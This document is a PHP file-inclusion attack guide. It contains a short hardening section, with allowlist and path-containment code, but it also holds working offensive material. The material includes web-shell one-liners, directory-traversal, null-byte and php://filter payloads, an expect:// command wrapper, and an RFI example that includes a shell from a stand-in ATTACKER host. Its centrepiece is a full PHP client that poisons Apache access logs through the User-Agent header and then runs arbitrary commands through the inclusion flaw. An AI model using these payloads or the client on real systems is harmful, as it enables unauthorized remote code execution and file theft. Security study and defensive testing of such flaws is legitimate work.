File Inclusion

In many applications, developers include files to load classes or to share templates between several web pages.

File inclusion vulnerabilities arise when a user-controlled parameter is used, without adequate validation, as part of a file name passed to an including function (require, require_once, include or include_once in PHP, for example). If such a call is vulnerable, an attacker can make the function load a file of their choosing. The same flaw can also be used as a directory traversal to read arbitrary files: a file without PHP tags is simply returned as output, while any file that contains an opening PHP tag is executed as PHP code.

The including function can load local or remote resources (a URL, for example). Depending on which, a vulnerable call leads to:

  • Local File Include: LFI. A local file is read and interpreted.

  • Remote File Include: RFI. A remote file is retrieved and interpreted.

By default, PHP refuses to include remote files: the configuration option allow_url_include is Off (and remote includes additionally require allow_url_fopen to be On).

One-liner payload: <?php system($_GET['param']); ?>
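The following is an added example, not code from the original page: a minimal vulnerable include next to two hardened versions of the same page selector. It assumes the templates live in <app>/pages/<name>.php and are chosen with ?page=<name>; the function and constant names are illustrative.

```php
<?php
// Added example (not from the original page). Assumed layout: pages/<name>.php selected with ?page=<name>.
declare(strict_types=1);

// VULNERABLE: the parameter flows straight into include().
function render_vulnerable(string $page): void
{
    // Every payload on this page works here:
    //   ?page=../../../../etc/passwd                                -> file read (no PHP tags, so it is echoed)
    //   ?page=php://filter/convert.base64-encode/resource=index.php -> source disclosure instead of execution
    //   ?page=../../../../var/log/apache2/access.log                -> runs whatever PHP was planted in the log
    //   ?page=http://ATTACKER/shell.txt                             -> RFI, only if allow_url_include=On
    // Appending a fixed suffix (include $page . '.php';) is not a fix: a trailing %00 removed it on
    // PHP < 5.3.4, and php://filter/.../resource=index still resolves because the suffix completes the name.
    include $page;
}

// HARDENED, option 1: a strict allowlist. User input is only ever used as an array key.
const PAGES = ['home' => 'home.php', 'about' => 'about.php', 'contact' => 'contact.php'];

function render_allowlist(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        http_response_code(404);
        exit('not found');
    }
    include __DIR__ . '/pages/' . PAGES[$page];
}

// HARDENED, option 2 (when an allowlist is impractical): restrict the charset, canonicalise, check containment.
function resolve_page(string $page, string $baseDir): ?string
{
    // No slashes, dots or colons: rules out ../, absolute paths and every wrapper (php://, http://, expect://).
    // The character class also excludes the null byte.
    if (!preg_match('/\A[a-z0-9_-]+\z/', $page)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $page . '.php');   // realpath() follows symlinks and is false for missing files
    if ($base === false || $path === false) {
        return null;
    }
    // Belt and braces: a symlink inside pages/ pointing outside the directory is still rejected.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_contained(string $page): void
{
    $path = resolve_page($page, __DIR__ . '/pages');
    if ($path === null) {
        http_response_code(404);
        exit('not found');
    }
    include $path;
}
```

Prefer the allowlist whenever the set of includable files is known in advance. Independently of the code, keep allow_url_include=Off (the default) and, if the application never fetches URLs, allow_url_fopen=Off as well, so that a residual LFI cannot be turned into an RFI.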

LFI

Payloads

## Directory Traversal
# Traverse through a directory that exists: on Linux every path component must resolve, so
# /doesnotexist/../etc/passwd fails while /var/www/../../etc/passwd resolves to /etc/passwd
http://URL/?id=/var/www/../../etc/passwd
# Null byte, to cut off a suffix the application appends (e.g. ".php"); only works on PHP < 5.3.4,
# newer versions reject paths containing a null byte
http://URL/?id=../../../etc/passwd%00

## LFI
# View PHP source code: the php://filter wrapper returns the file base64-encoded instead of executing it
# (works regardless of allow_url_include; decode the blob to get the source)
http://URL/index.php?page=php://filter/convert.base64-encode/resource=index

Access-Log Poisoning

Access Log Locations

  • RHEL / Red Hat / CentOS / Fedora Linux Apache access log file location – /var/log/httpd/access_log

  • Debian / Ubuntu Linux Apache access log file location – /var/log/apache2/access.log

  • FreeBSD Apache access log file location – /var/log/httpd-access.log

Exploitation

  • Requests to the web server are written to the access log. This includes the User-Agent header, which is fully attacker-controlled.

  • The log is a plain text file, but when it is pulled in through the vulnerable include, PHP executes whatever lies between PHP tags. A payload can therefore be placed in any request header that ends up in the access log.

  • Inject syntactically valid PHP, and get it right the first time: a single parse error anywhere in the log breaks every later include of it, which renders the file useless for exploitation. Use single quotes inside the payload, because Apache escapes double quotes as \" in log entries.

<?php echo ('Testing for code execution'); ?>
<?php system($_REQUEST['cmd']); ?>
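The two-step procedure above as an added, self-contained PHP CLI client; this is not code from the original page. The target URL, the index.php?page= parameter, the Debian log path and the marker string are assumptions taken from the examples on this page; adjust them to the target.

```php
<?php
// Added example (not from the original page): access-log poisoning through an LFI, in two steps.
// Assumptions: vulnerable endpoint http://URL/index.php?page=..., Apache on Debian/Ubuntu, PHP 7.1+ locally.
declare(strict_types=1);

const TARGET   = 'http://URL/';                              // any URL on the target: it only has to be logged
const LFI      = 'http://URL/index.php?page=';               // assumed LFI endpoint
const LOG_PATH = '../../../../var/log/apache2/access.log';   // Debian/Ubuntu location (see list above)
const MARK     = 'X9Q';                                      // delimiter so the command output can be cut out of the whole log

// Only single quotes inside the payload: Apache writes `"` into the log as `\"`, which would turn the
// planted PHP into a parse error and break every later include of the file.
const PAYLOAD = "<?php echo '" . MARK . "'; system(\$_GET['cmd']); echo '" . MARK . "'; ?>";

function http_get(string $url, array $headers = []): ?string
{
    $ctx = stream_context_create(['http' => [
        'method'        => 'GET',
        'header'        => implode("\r\n", $headers),
        'ignore_errors' => true,   // still return the body on 4xx/5xx
        'timeout'       => 10,
    ]]);
    $body = @file_get_contents($url, false, $ctx);
    return $body === false ? null : $body;
}

// Step 1: get the payload written into access.log via the User-Agent header.
// Send it once and correctly: a broken entry cannot be removed again.
function poison(): void
{
    http_get(TARGET, ['User-Agent: ' . PAYLOAD]);
}

// Step 2: include the log through the LFI and pull the command output out from between the markers.
function run(string $cmd): ?string
{
    $body = http_get(LFI . LOG_PATH . '&cmd=' . rawurlencode($cmd),
                     ['User-Agent: lfi-client']);   // harmless UA so this request does not re-poison the log
    return $body === null ? null : extract_output($body, MARK);
}

// Returns the text between the first pair of markers, or null if the payload did not execute
// (log unreadable by the web user, parse error in the log, or wrong path).
function extract_output(string $body, string $mark): ?string
{
    $start = strpos($body, $mark);
    if ($start === false) {
        return null;
    }
    $start += strlen($mark);
    $end = strpos($body, $mark, $start);
    return $end === false ? null : substr($body, $start, $end - $start);
}

if (PHP_SAPI === 'cli') {
    $mode = $argv[1] ?? '';
    if ($mode === 'poison') {
        poison();
        echo "payload sent; now try: php lfi.php run id\n";
    } elseif ($mode === 'run' && isset($argv[2])) {
        echo run($argv[2]) ?? "no output: payload not executed (unreadable log, parse error, or wrong path)\n";
    } else {
        fwrite(STDERR, "usage: php lfi.php poison | php lfi.php run '<command>'\n");
        exit(1);
    }
}
```

The markers matter in practice: without them the response is the entire access log with the command output buried somewhere inside it. The raw marker text inside the planted code is consumed by the PHP parser when the log is included, so only the echoed copies appear in the response.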

Vulnerable index.php File

On this web application the vulnerability exists in the index.php file. Using ../../../../var/log/apache2/access.log as the payload, we were able to see the following:

As shown, the phpinfo() output was rendered, meaning that our injected code was executed.

File Upload Race Condition

RFI

  • ftp://

  • http://

  • expect:// (requires the PECL expect extension, which is not installed by default)

The PHP expect wrapper runs a system command and returns its output. The syntax is:

expect://[command]

RFI To Code Exec

# Host a shell.txt on a server you control (served as plain text, so your own server does not execute it) containing one of these payloads:
<?php system($_REQUEST["cmd"]); ?>
<?php echo shell_exec($_REQUEST["cmd"]); ?>

# Include it through the vulnerable parameter (requires allow_url_include=On on the target)
http://URL/vuln_file.php?page=http://ATTACKER/shell.txt&cmd=whoami
